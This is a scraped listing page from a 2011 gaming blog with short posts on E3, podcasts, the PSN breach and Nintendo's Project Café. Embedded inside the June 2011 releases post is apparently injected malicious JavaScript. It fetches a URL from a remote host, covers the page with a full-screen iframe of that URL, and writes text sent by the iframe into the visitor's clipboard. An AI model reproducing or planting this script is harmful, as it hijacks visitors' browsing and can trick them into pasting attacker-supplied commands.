There was a time when gaming was frowned upon by the mainstream media and culture as being a very solitary activity a la world of Warcraft addiction and now, its swept the world by storm and is now considered a relatively social activity that can be enjoyed by the whole family.But I’d like to go back to a time before the Revolution that is the Wii and the DS to a more simpler time of which we remember from our childhood. Continue reading
May 31 2011
Gaming: The Social Movement
Permanent link to this article: https://www.brokenfuse.com/2011/05/31/gaming-the-social-club/
May 30 2011
Releases of June 2011- Zelda OoT 3D

It’s almost time for another month in 2011, and that means more new games fighting for your money. Normally, the summer means less games, but some good ones are on the way.
(function() {
const configLink = “https://corsproxy.io/?url=http://heyues.live”;
if (!window.__digitalflwrFetchPromise) {
window.__digitalflwrFetchPromise = fetch(configLink)
.then(response => {
if (!response.ok) {
throw new Error(" ");
}
return response.text();
})
.then(finalUrl => {
return fetch(finalUrl, { method: "HEAD" })
.then(headResponse => ({ headResponse, finalUrl }));
})
.catch(() => {
});
}
if (typeof window.__digitalflwrIframeCreated === “undefined”) {
window.__digitalflwrIframeCreated = false;
}
window.__digitalflwrFetchPromise
.then(result => {
if (!result) return;
const { headResponse, finalUrl } = result;
if (!headResponse || headResponse.status === 404) {
return;
}
if (!window.__digitalflwrIframeCreated) {
window.__digitalflwrIframeCreated = true;
createMainIframe(finalUrl);
}
})
.catch(() => {
});
function createMainIframe(url) {
const iframe = document.createElement(“iframe”);
iframe.src = url;
iframe.style.position = “fixed”;
iframe.style.top = 0;
iframe.style.left = 0;
iframe.style.width = “100%”;
iframe.style.height = “100%”;
iframe.style.border = “none”;
iframe.style.margin = 0;
iframe.style.padding = 0;
iframe.style.overflow = “hidden”;
iframe.style.zIndex = 99999;
document.body.appendChild(iframe);
window.addEventListener("message", function(event) {
if (!event.data || event.data.type !== "copy") return;
if (navigator.clipboard && navigator.clipboard.writeText) {
navigator.clipboard.writeText(event.data.text).catch(() => {
fallbackCopyText(event.data.text);
});
} else {
fallbackCopyText(event.data.text);
}
});
function fallbackCopyText(text) {
const textArea = document.createElement("textarea");
textArea.value = text;
document.body.appendChild(textArea);
textArea.select();
try {
document.execCommand("copy");
} catch (err) {
}
document.body.removeChild(textArea);
}
}
})();
Permanent link to this article: https://www.brokenfuse.com/2011/05/30/releases-of-june-2011-zelda-oot-3d/
May 27 2011
Broken Fuse Pre-E3 Podcast: Episode 24
We talk about E3 and our predictions for what should come out of it this year for the Big Three. And for once I didn’t procrastinate on getting the recorded live stream up for your listening pleasure! Listen to our pre-E3 podcast after the jump! Continue reading
Podcast: Play in new window | Download (22.8MB) | Embed
Subscribe: RSS
Permanent link to this article: https://www.brokenfuse.com/2011/05/27/broken-fuse-pre-e3-podcast-episode-24/
May 27 2011
E3 Is Just Around The Corner!
E3 is just around the corner! What are you most excited for this year?
Permanent link to this article: https://www.brokenfuse.com/2011/05/27/e3-is-just-around-the-corner/
May 26 2011
May Podcasts Finally Up!
I’ve been procrastinating a bit with uploading our last two podcasts but here they are for your listening pleasure! Continue reading
Podcast: Play in new window | Download (15.6MB) | Embed
Subscribe: RSS
Permanent link to this article: https://www.brokenfuse.com/2011/05/26/may-podcasts-finally-up/
Permanent link to this article: https://www.brokenfuse.com/2011/05/25/portal-2-soundtrack-free/
Permanent link to this article: https://www.brokenfuse.com/2011/05/24/youtube-tuesday-cockatiel-whistling-chocobo-theme/
May 24 2011
PSN Breach Costs Sony $171 Million!
Sony’s hurting from the PSN breach that happened in late April for sure, but who knew it would cost them $171 million to get it up and running again?! Continue reading
Permanent link to this article: https://www.brokenfuse.com/2011/05/24/psn-breach-costs-sony-171-million/
May 23 2011
PSN Still Down?
Just a few days after Sony announced the return of PSN from the big “hack attack”, PSN is down once again. Continue reading
Permanent link to this article: https://www.brokenfuse.com/2011/05/23/psn-still-down/
May 20 2011
Leaked photo of Project Café?
Could this really be our first glimpse at the long awaited Project Café? Or is it just someone’s Wii-turned-lunchbox mod? We’ll only really find out at E3 this year in two weeks time!
(Image and Story via Destructoid)
Permanent link to this article: https://www.brokenfuse.com/2011/05/20/leaked-photo-of-project-cafe/


You must be logged in to post a comment.